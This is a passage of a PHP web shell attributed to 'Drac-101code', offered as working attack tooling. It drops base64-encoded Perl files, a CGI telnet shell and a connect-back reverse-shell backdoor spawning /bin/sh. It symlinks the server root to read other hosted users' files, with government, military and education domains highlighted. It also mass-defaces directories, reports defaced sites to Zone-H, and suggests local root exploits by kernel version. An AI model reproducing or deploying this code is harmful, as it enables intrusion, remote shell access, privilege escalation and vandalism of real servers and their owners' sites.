1857. Z2V0RmlsZSA9ICRDdXJyZW50RGlyKSA9fiBtL1tcXFwvXSQvOw0KCQkkVGFyZ2V0RmlsZSAuPSAk
1858. UGF0aFNlcC4kVHJhbnNmZXJGaWxlOw0KCX0NCg0KCWlmKCRPcHRpb25zIGVxICJnbyIpICMgd2Ug
1859. aGF2ZSB0byBzZW5kIHRoZSBmaWxlDQoJew0KCQkmU2VuZEZpbGVUb0Jyb3dzZXIoJFRhcmdldEZp
1860. bGUpOw0KCX0NCgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQ0KCXsN
1861. CgkJJlByaW50RG93bmxvYWRMaW5rUGFnZSgkVGFyZ2V0RmlsZSk7DQoJfQ0KfQ0KDQojLS0tLS0t
1862. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1863. LS0tLS0tLS0tLS0tLS0tDQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIg
1864. d2FudHMgdG8gdXBsb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGUgaXMgbm90IHNwZWNpZmllZCwg
1865. aXQgZGlzcGxheXMgYSBmb3JtIGFsbG93aW5nIHRoZSB1c2VyIHRvIHNwZWNpZnkgYQ0KIyBmaWxl
1866. LCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4NCiMtLS0tLS0tLS0tLS0t
1867. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1868. LS0tLS0tLS0NCnN1YiBVcGxvYWRGaWxlDQp7DQoJIyBpZiBubyBmaWxlIGlzIHNwZWNpZmllZCwg
1869. cHJpbnQgdGhlIHVwbG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5zZmVyRmlsZSBlcSAiIikNCgl7
1870. DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50RmlsZVVwbG9hZEZvcm07DQoJCSZQ
1871. cmludFBhZ2VGb290ZXI7DQoJCXJldHVybjsNCgl9DQoJJlByaW50UGFnZUhlYWRlcigiYyIpOw0K
1872. DQoJIyBzdGFydCB0aGUgdXBsb2FkaW5nIHByb2Nlc3MNCglwcmludCAiVXBsb2FkaW5nICRUcmFu
1873. c2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsNCg0KCSMgZ2V0IHRoZSBmdWxsbHkgcXVh
1874. bGlmaWVkIHBhdGhuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGNyZWF0ZWQNCgljaG9wKCRUYXJnZXRO
1875. YW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsNCgkkVHJh
1876. bnNmZXJGaWxlID1+IG0hKFteL15cXF0qKSQhOw0KCSRUYXJnZXROYW1lIC49ICRQYXRoU2VwLiQx
1877. Ow0KDQoJJFRhcmdldEZpbGVTaXplID0gbGVuZ3RoKCRpbnsnZmlsZWRhdGEnfSk7DQoJIyBpZiB0
1878. aGUgZmlsZSBleGlzdHMgYW5kIHdlIGFyZSBub3Qgc3VwcG9zZWQgdG8gb3ZlcndyaXRlIGl0DQoJ
1879. aWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpDQoJew0KCQlwcmlu
1880. dCAiRmFpbGVkOiBEZXN0aW5hdGlvbiBmaWxlIGFscmVhZHkgZXhpc3RzLjxicj4iOw0KCX0NCgll
1881. bHNlICMgZmlsZSBpcyBub3QgcHJlc2VudA0KCXsNCgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRU
1882. YXJnZXROYW1lIikpDQoJCXsNCgkJCWJpbm1vZGUoVVBMT0FERklMRSkgaWYgJFdpbk5UOw0KCQkJ
1883. cHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307DQoJCQljbG9zZShVUExPQURGSUxFKTsN
1884. CgkJCXByaW50ICJUcmFuc2ZlcmVkICRUYXJnZXRGaWxlU2l6ZSBCeXRlcy48YnI+IjsNCgkJCXBy
1885. aW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7DQoJCX0NCgkJZWxzZQ0KCQl7DQoJCQlw
1886. cmludCAiRmFpbGVkOiAkITxicj4iOw0KCQl9DQoJfQ0KCXByaW50ICIiOw0KCSZQcmludENvbW1h
1887. bmRMaW5lSW5wdXRGb3JtOw0KDQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0tLS0tLS0t
1888. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1889. LS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB1c2VyIHdhbnRz
1890. IHRvIGRvd25sb2FkIGEgZmlsZS4gSWYgdGhlDQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQs
1891. IGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGENCiMgZmls
1892. ZSwgb3RoZXJ3aXNlIGl0IGRpc3BsYXlzIGEgbWVzc2FnZSB0byB0aGUgdXNlciBhbmQgcHJvdmlk
1893. ZXMgYSBsaW5rDQojIHRocm91Z2ggIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLg0K
1894. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1895. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIERvd25sb2FkRmlsZQ0Kew0KCSMgaWYgbm8gZmls
1896. ZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluDQoJaWYoJFRyYW5z
1897. ZmVyRmlsZSBlcSAiIikNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsNCgkJJlByaW50Rmls
1898. ZURvd25sb2FkRm9ybTsNCgkJJlByaW50UGFnZUZvb3RlcjsNCgkJcmV0dXJuOw0KCX0NCgkNCgkj
1899. IGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkDQoJ
1900. aWYoKCRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlxcfF4uOi8pKSB8DQoJCSghJFdpbk5U
1901. ICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXC8vKSkpICMgcGF0aCBpcyBhYnNvbHV0ZQ0KCXsNCgkJ
1902. JFRhcmdldEZpbGUgPSAkVHJhbnNmZXJGaWxlOw0KCX0NCgllbHNlICMgcGF0aCBpcyByZWxhdGl2
1903. ZQ0KCXsNCgkJY2hvcCgkVGFyZ2V0RmlsZSkgaWYoJFRhcmdldEZpbGUgPSAkQ3VycmVudERpcikg
1904. PX4gbS9bXFxcL10kLzsNCgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsN
1905. Cgl9DQoNCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQ0K
1906. CXsNCgkJJlNlbmRGaWxlVG9Ccm93c2VyKCRUYXJnZXRGaWxlKTsNCgl9DQoJZWxzZSAjIHdlIGhh
1907. dmUgdG8gc2VuZCBvbmx5IHRoZSBsaW5rIHBhZ2UNCgl7DQoJCSZQcmludERvd25sb2FkTGlua1Bh
1908. Z2UoJFRhcmdldEZpbGUpOw0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1909. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBNYWlu
1910. IFByb2dyYW0gLSBFeGVjdXRpb24gU3RhcnRzIEhlcmUNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
1911. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
1912. CiZSZWFkUGFyc2U7DQomR2V0Q29va2llczsNCg0KJFNjcmlwdExvY2F0aW9uID0gJEVOVnsnU0NS
1913. SVBUX05BTUUnfTsNCiRTZXJ2ZXJOYW1lID0gJEVOVnsnU0VSVkVSX05BTUUnfTsNCiRMb2dpblBh
1914. c3N3b3JkID0gJGlueydwJ307DQokUnVuQ29tbWFuZCA9ICRpbnsnYyd9Ow0KJFRyYW5zZmVyRmls
1915. ZSA9ICRpbnsnZid9Ow0KJE9wdGlvbnMgPSAkaW57J28nfTsNCg0KJEFjdGlvbiA9ICRpbnsnYSd9
1916. Ow0KJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNp
1917. ZmllZCwgdXNlIGRlZmF1bHQNCg0KIyBnZXQgdGhlIGRpcmVjdG9yeSBpbiB3aGljaCB0aGUgY29t
1918. bWFuZHMgd2lsbCBiZSBleGVjdXRlZA0KJEN1cnJlbnREaXIgPSAkaW57J2QnfTsNCmNob3AoJEN1
1919. cnJlbnREaXIgPSBgJENtZFB3ZGApIGlmKCRDdXJyZW50RGlyIGVxICIiKTsNCg0KJExvZ2dlZElu
1920. ID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOw0KDQppZigkQWN0aW9uIGVxICJs
1921. b2dpbiIgfHwgISRMb2dnZWRJbikgIyB1c2VyIG5lZWRzL2hhcyB0byBsb2dpbg0Kew0KCSZQZXJm
1922. b3JtTG9naW47DQoNCn0NCmVsc2lmKCRBY3Rpb24gZXEgImNvbW1hbmQiKSAjIHVzZXIgd2FudHMg
1923. dG8gcnVuIGEgY29tbWFuZA0Kew0KCSZFeGVjdXRlQ29tbWFuZDsNCn0NCmVsc2lmKCRBY3Rpb24g
1924. ZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlDQp7DQoJJlVwbG9hZEZp
1925. bGU7DQp9DQplbHNpZigkQWN0aW9uIGVxICJkb3dubG9hZCIpICMgdXNlciB3YW50cyB0byBkb3du
1926. bG9hZCBhIGZpbGUNCnsNCgkmRG93bmxvYWRGaWxlOw0KfQ0KZWxzaWYoJEFjdGlvbiBlcSAibG9n
1927. b3V0IikgIyB1c2VyIHdhbnRzIHRvIGxvZ291dA0Kew0KCSZQZXJmb3JtTG9nb3V0Ow0KfQ==';
1928.  
1929. $file = fopen("izo.cin" ,"w+");
1930. $write = fwrite ($file ,base64_decode($cgishellizocin));
1931. fclose($file);
1932. chmod("izo.cin",0755);
1933. $netcatshell = 'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh
1934. MHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog
1935. ICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo
1936. MSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg
1937. ICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb
1938. MV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb
1939. Kl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An
1940. KSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf
1941. SU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg
1942. ICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF
1943. UlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi
1944. VW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu
1945. ZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+
1946. JlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl
1947. bihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu
1948. ICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE
1949. YXRhY2hlZFxuXG4iOw==';
1950.  
1951. $file = fopen("dc.pl" ,"w+");
1952. $write = fwrite ($file ,base64_decode($netcatshell));
1953. fclose($file);
1954. chmod("dc.pl",0755);
1955. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
1956. echo '</div>';
1957. printFooter();
1958.  
1959. }
1960.  
1961.  
1962. function actionSymlink(){
1963.  
1964. printHeader();
1965.  
1966. echo '<form action="" method="post">';
1967.  
1968. @set_time_limit(0);
1969.  
1970. echo "<center>";
1971.  
1972. @mkdir('sym',0777);
1973. $htaccess = "Options all \n DirectoryIndex readme.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1974. $write =@fopen ('sym/.htaccess','w');
1975. fwrite($write ,$htaccess);
1976. @symlink('/','sym/root');
1977. $filelocation = basename(__FILE__);
1978. $read_named_conf = @file('/etc/named.conf');
1979. if(!$read_named_conf)
1980. {
1981. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
1982. }
1983. else
1984. {
1985. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
1986. foreach($read_named_conf as $subject){
1987. if(eregi('zone',$subject)){
1988. preg_match_all('#zone "(.*)"#',$subject,$string);
1989. flush();
1990. if(strlen(trim($string[1][0])) >2){
1991. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
1992. $name = $UID['name'] ;
1993. @symlink('/','sym/root');
1994. $name = $string[1][0];
1995. $iran = '\.ir';
1996. $israel = '\.il';
1997. $indo = '\.id';
1998. $sg12 = '\.sg';
1999. $edu = '\.edu';
2000. $gov = '\.gov';
2001. $gose = '\.go';
2002. $gober = '\.gob';
2003. $mil1 = '\.mil';
2004. $mil2 = '\.mi';
2005. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
2006. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
2007. {
2008. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
2009. }
2010. echo "
2011. <tr>
2012.  
2013. <td>
2014. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
2015. </td>
2016.  
2017. <td>
2018. '.$UID['name']."
2019. </td>
2020.  
2021. <td>
2022. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
2023. </td>
2024.  
2025. </tr></div> ";
2026. flush();
2027. }
2028. }
2029. }
2030. }
2031.  
2032. echo "</center></table>";
2033. printFooter();
2034. }
2035.  
2036. function actionDeface(){
2037. printHeader();
2038. echo "<h1>Single User Mass Deface</h1><div class=content>";
2039.  
2040. ?>
2041. <form ENCTYPE="multipart/form-data" action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.path.value,this.file.value,this.Contents.value);return false;">
2042. <p align="Left">Folder: <input type=text name=path size=60 value="<?=getcwd();?>">
2043. <br>file name : <input type=text name=file size=20 value="readme.html">
2044. <br>Text Content : <input type=text name=Contents size=20 value="musuh utama kita adalah nafsu, munafik dan kafir dalam diri kita, <br><br>- Drac-101code">
2045. <br><input type=submit value="Update"></p></form>
2046.  
2047. <?php
2048. if($_POST['a'] == 'Deface'){
2049. $mainpath=$_POST[p1];
2050. $file=$_POST[p2];
2051. $txtContents=$_POST[p3];
2052. echo "-----------------------------------------------<br>
2053. [+] Single user Mass defacer<br>
2054. -----------------------------------------------<br><br> ";
2055. $dir=opendir($mainpath); //fixme - cannot deface when change to writeable path!!
2056. while($row=readdir($dir))
2057. {
2058. $start=@fopen("$row/$file","w+");
2059. $code=$txtContents;
2060. $finish=@fwrite($start,$code);
2061. if ($finish)
2062. {
2063. echo "$row/$file > Done<br><br>";
2064. }
2065. }
2066. echo "-----------------------------------------------<br><br>[+] Script by Drac-101code ...";
2067. }
2068. echo '</div>';
2069. printFooter();
2070. }
2071.  
2072.  
2073. /* test function - reserved by Drac-101code */
2074. function actionTest(){
2075. printHeader();
2076. echo '<h1>Testing function</h1><div class=content>';
2077. echo '<br>';
2078.  
2079. ?>
2080. <form action="<?$_SERVER['PHP_SELF']?>" method=POST onSubmit="g(null,null,this.fname.value);return false;">
2081. Name: <input type="text" name="fname" />
2082. <input type="submit" value=">>">
2083. </form>
2084. </br>
2085. <?php
2086.  
2087. if($_POST['a'] == 'Test') {
2088. $out = $_POST['p1'];
2089. echo "name : $out";
2090.  
2091. }
2092. echo '</div>';
2093. printFooter();
2094. }
2095.  
2096. function actionDomain(){
2097. printHeader();
2098. echo '<h1>local domain viewer</h1><div class=content>';
2099.  
2100. $file = @implode(@file("/etc/named.conf"));
2101. if(!$file){ die("# can't ReaD -> [ /etc/named.conf ]"); }
2102. preg_match_all("#named/(.*?).db#",$file ,$r);
2103. $domains = array_unique($r[1]);
2104. //check();
2105. //if(isset($_GET['ShowAll']))
2106. {
2107. echo "<table align=center border=1 width=59% cellpadding=5>
2108. <tr><td colspan=2>[+] There are : [ <b>".count($domains)."</b> ] Domain</td></tr>
2109. <tr><td>Domain</td><td>User</td></tr>";
2110. foreach($domains as $domain){
2111. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domain));
2112.  
2113. echo "<tr><td>$domain</td><td>".$user['name']."</td></tr>";
2114. }
2115. echo "</table>";
2116. }
2117.  
2118. echo '</div>';
2119. printFooter();
2120. }
2121.  
2122. function actionZHposter(){
2123. printHeader();
2124. echo '<h1>Zone-H Poster</h1><div class=content>';
2125.  
2126. echo '<form action="" method="post" onSubmit=da2(null,null,this.p1.value,this.p2.value,this.p3.value,this.p4.value);return true;">
2127. <input type="text" name="p1" size="40" value="Attacker" /></br>
2128. <select name="p2">
2129. <option >--------SELECT--------</option>
2130. <option value="1">known vulnerability (i.e. unpatched system)</option>
2131. <option value="2" >undisclosed (new) vulnerability</option>
2132. <option value="3" >configuration / admin. mistake</option>
2133. <option value="4" >brute force attack</option>
2134. <option value="5" >social engineering</option>
2135. <option value="6" >Web Server intrusion</option>
2136. <option value="7" >Web Server external module intrusion</option>
2137. <option value="8" >Mail Server intrusion</option>
2138. <option value="9" >FTP Server intrusion</option>
2139. <option value="10" >SSH Server intrusion</option>
2140. <option value="11" >Telnet Server intrusion</option>
2141. <option value="12" >RPC Server intrusion</option>
2142. <option value="13" >Shares misconfiguration</option>
2143. <option value="14" >Other Server intrusion</option>
2144. <option value="15" >SQL Injection</option>
2145. <option value="16" >URL Poisoning</option>
2146. <option value="17" >File Inclusion</option>
2147. <option value="18" >Other Web Application bug</option>
2148. <option value="19" >Remote administrative panel access bruteforcing</option>
2149. <option value="20" >Remote administrative panel access password guessing</option>
2150. <option value="21" >Remote administrative panel access social engineering</option>
2151. <option value="22" >Attack against administrator(password stealing/sniffing)</option>
2152. <option value="23" >Access credentials through Man In the Middle attack</option>
2153. <option value="24" >Remote service password guessing</option>
2154. <option value="25" >Remote service password bruteforce</option>
2155. <option value="26" >Rerouting after attacking the Firewall</option>
2156. <option value="27" >Rerouting after attacking the Router</option>
2157. <option value="28" >DNS attack through social engineering</option>
2158. <option value="29" >DNS attack through cache poisoning</option>
2159. <option value="30" >Not available</option>
2160. </select>
2161. </br>
2162. <select name="p3">
2163. <option >--------SELECT--------</option>
2164. <option value="1" >Heh...just for fun!</option>
2165. <option value="2" >Revenge against that website</option>
2166. <option value="3" >Political reasons</option>
2167. <option value="4" >As a challenge</option>
2168. <option value="5" >I just want to be the best defacer</option>
2169. <option value="6" >Patriotism</option>
2170. <option value="7" >Not available</option>
2171. </select>
2172. </br>
2173. <textarea name="p4" cols="44" rows="9">List Of Domains</textarea>
2174. <input type="submit" value="Send Now !" />
2175. </form>';
2176. echo "</td></tr></table></form>";
2177.  
2178. if($_POST['a'] == 'ZHposter')
2179. {
2180. ob_start();
2181. $sub = @get_loaded_extensions();
2182. if(!in_array("curl", $sub))
2183. {
2184. die('[-] Curl Is Not Supported !! ');
2185. }
2186.  
2187. $hacker9 = $_POST['p1'];
2188. $method9 = $_POST['p2'];
2189. $neden9 = $_POST['p3'];
2190. $site9 = $_POST['p4'];
2191.  
2192. if (empty($hacker9))
2193. {
2194. die ("[-] You Must Fill the Attacker name !");
2195. }
2196. elseif($method9 == "--------SELECT--------")
2197. {
2198. die("[-] You Must Select The Method !");
2199. }
2200. elseif($neden9 == "--------SELECT--------")
2201. {
2202. die("[-] You Must Select The Reason");
2203. }
2204. elseif(empty($site9))
2205. {
2206. die("[-] You Must Inter the Sites List ! ");
2207. }
2208.  
2209. $i = 0;
2210. $sites = explode("\n", $site9);
2211. while($i < count($sites))
2212. {
2213.  
2214. if(substr($sites[$i], 0, 4) != "http")
2215. {
2216. $sites[$i] = "http://".$sites[$i];
2217. }
2218. ZoneH("http://zone-h.org/notify/single", $hacker9, $method9, $neden9, $sites[$i]);
2219. echo "Site : ".$sites[$i]." Defaced ! </br>";
2220. ++$i;
2221. }
2222. echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
2223.  
2224. }
2225. echo '</div';
2226. printFooter();
2227. }
2228.  
2229. function ZoneH($url9, $hacker9, $hackmode9,$reson9, $site9 )
2230. {
2231. $k = curl_init();
2232. curl_setopt($k, CURLOPT_URL, $url9);
2233. curl_setopt($k,CURLOPT_POST,true);
2234. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker9."&domain1=". $site9."&hackmode=".$hackmode9."&reason=".$reson9);
2235. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
2236. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
2237. $kubra = curl_exec($k);
2238. curl_close($k);
2239. return $kubra;
2240. }
2241.  
2242. function rootxpL()
2243. {
2244. $v=@php_uname();
2245. $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
2246. foreach($db as $k=>$x)if(strstr($v,$k))return $x;
2247. if(!$xpl)$xpl='<font color="red">Not found.</font>';
2248. return $xpl;
2249. }
2250.  
2251. /* additional Function */
2252.  
2253.  
2254. /* additionanal endsss */
2255.  
2256. if( empty($_POST['a']) )
2257. if(isset($default_action) && function_exists('action' . $default_action))
2258. $_POST['a'] = $default_action;
2259. else $_POST['a'] = 'SecInfo';
2260. if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) )
2261. call_user_func('action' . $_POST['a']);